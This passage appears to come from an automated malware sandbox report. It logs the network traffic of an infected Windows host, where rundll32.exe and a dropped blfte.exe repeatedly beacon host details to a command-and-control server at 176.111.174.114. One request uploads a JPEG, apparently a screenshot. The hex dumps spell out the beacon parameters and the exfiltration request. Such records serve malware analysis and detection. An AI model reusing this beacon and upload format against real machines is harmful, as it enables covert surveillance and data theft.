                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          551176.111.174.11480192.168.2.450080C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:37.922198057 CEST13076INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:37 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          552192.168.2.450082176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:38.135567904 CEST13077OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          553176.111.174.11480192.168.2.450082C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:38.240652084 CEST13077INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          554192.168.2.450083176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:38.445409060 CEST13078OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          555176.111.174.11480192.168.2.450083C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:38.550746918 CEST13078INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          556192.168.2.450084176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:38.763545036 CEST13079OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          557176.111.174.11480192.168.2.450084C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:38.871332884 CEST13080INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:38 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          558192.168.2.450085176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.089795113 CEST13080OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          559176.111.174.11480192.168.2.450085C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.197503090 CEST13081INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:39 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          56192.168.2.449776176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:19.501440048 CEST4549OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          560192.168.2.450086176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:39.370913982 CEST13094OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 23:00:39.468991995 CEST13097OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 23:00:39.469041109 CEST13100OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 23:00:39.470004082 CEST13103OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 23:00:39.470319986 CEST13105OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 23:00:39.470489025 CEST13108OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 23:00:39.470746994 CEST13111OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 23:00:39.471076965 CEST13114OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 23:00:39.471179008 CEST13116OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
